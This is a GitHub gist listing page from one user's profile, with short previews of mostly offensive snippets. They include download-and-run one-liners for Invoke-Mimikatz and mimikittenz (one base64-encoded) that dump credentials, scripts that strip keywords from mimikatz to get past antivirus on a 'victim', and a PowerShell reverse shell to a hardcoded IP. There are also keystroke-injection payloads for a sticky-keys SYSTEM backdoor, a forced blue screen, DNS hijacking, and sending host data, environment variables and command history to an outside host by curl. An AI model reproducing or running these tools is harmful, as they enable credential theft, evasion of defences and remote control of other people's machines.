Skip to content

Instantly share code, notes, and snippets.

🏠
Working from SapsLab

Jonny Banana JonnyBanana

🏠
Working from SapsLab
  • WebChainSolutions - SappohSamaWorkshop - Trolling Studios - ROOM#101 - H0wT0hAck - HTML.IT/Makers
  • Bologna - Italy
  • Sign in to view email
Block or report user

Report or block JonnyBanana

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEUAeABmAGkAbAB0AHIAYQB0AGkAbwBuAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAnACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0ARAB1AG0AcABDAHIAZQBkAHMAOwAgACQAbQAKAA==
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@JonnyBanana
JonnyBanana / Easy Fibonacci Sequence Calculator
Last active Apr 8, 2018
Easy Fibonacci Sequence Calculator in Python
View Easy Fibonacci Sequence Calculator
a,b=0,1
while(b < WRITE THE MAXIMUM NUMBER OF THE SEQUENCE):
print(b)
a,b=b,a+b
### EXAMPLE, CALCULATE THE SEQUENCE UP TO NUMBER 1000000 ###
a,b=0,1
while(b < 1000000):
View mimikatz_obfuscator.sh
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
@JonnyBanana
JonnyBanana / Quick-Invoke-BSOD
Created Apr 8, 2018
invoke BSOD "the Blue Screen of Death" from Windows PowerShell
View Quick-Invoke-BSOD
*NOTE - invoke BSOD "the Blue Screen of Death" i have take this script from here: https://github.com/peewpw/Invoke-BSOD*
PS>IEX((New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-BSOD/master/Invoke-BSOD.ps1'));Invoke-BSOD
@JonnyBanana
JonnyBanana / invoke_evasion.sh
Created Apr 8, 2018 — forked from PaulSec/invoke_evasion.sh
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
View invoke_evasion.sh
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
View Blue Screener
REM Title: BlueScreener
REM Note: Cheap and easy way to force a kernel panic (BSoD) in Windows
DELAY 4000
CONTROL ESCAPE
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 600
View StickyWindowsBackdoor
REM Note: Adjust delays to match host CPU speed
REM To Undo: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
REM Desc: Adds a registry entry to enable the classic sticky keys SYSTEM level cmd backdoor
REM UAC CMD Bypass
DELAY 2000
CONTROL ESCAPE
DELAY 300
STRING cmd
CTRL-SHIFT ENTER
View Powershell_Reverse_Shell
#A simple and small reverse shell. Options and help removed to save space.
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.15",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
#$sm=(New-Object Net.Sockets.TCPClient("192.168.1.15",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
View exfiltrate some infos...
REM Exfiltrate various useful information.
REM To capture, run `nc -l 9999`.
REM Make sure to update the hostname before using it.
DELAY 1000
ALT F2
DELAY 100
STRING sh -c "{ printf 'Hostname: '; hostname; echo; printf 'uname: '; uname -a; echo; echo Env:; env; echo; echo Network:; nmcli; echo; /sbin/ifconfig -a; echo '/etc/hosts:'; cat /etc/hosts; echo; echo Mounts:; mount; echo; echo 'Running services:'; netstat -tunlpe; echo; echo 'Installed packages:'; dpkg -l || dnf list --installed || pacman -Ql; echo; echo 'Command history:'; history; echo; } | curl -F data='<-' http://eternal-pickle:9999"
ENTER
View networkmanager-dns-mitm
REM Set up a DNS-based MITM attack.
DELAY 1000
ALT F2
DELAY 100
STRING sh -c 'function mitm() { for ((i=0;i<10;i++)); do nmcli connection modify "$1" -ipv4.dns 0; done; nmcli connection modify "$1" +ipv4.dns 8.8.8.8; }; for x in $(nmcli -t connection show --active | cut -d: -f1); do mitm "$x"; done;'
ENTER
You can’t perform that action at this time.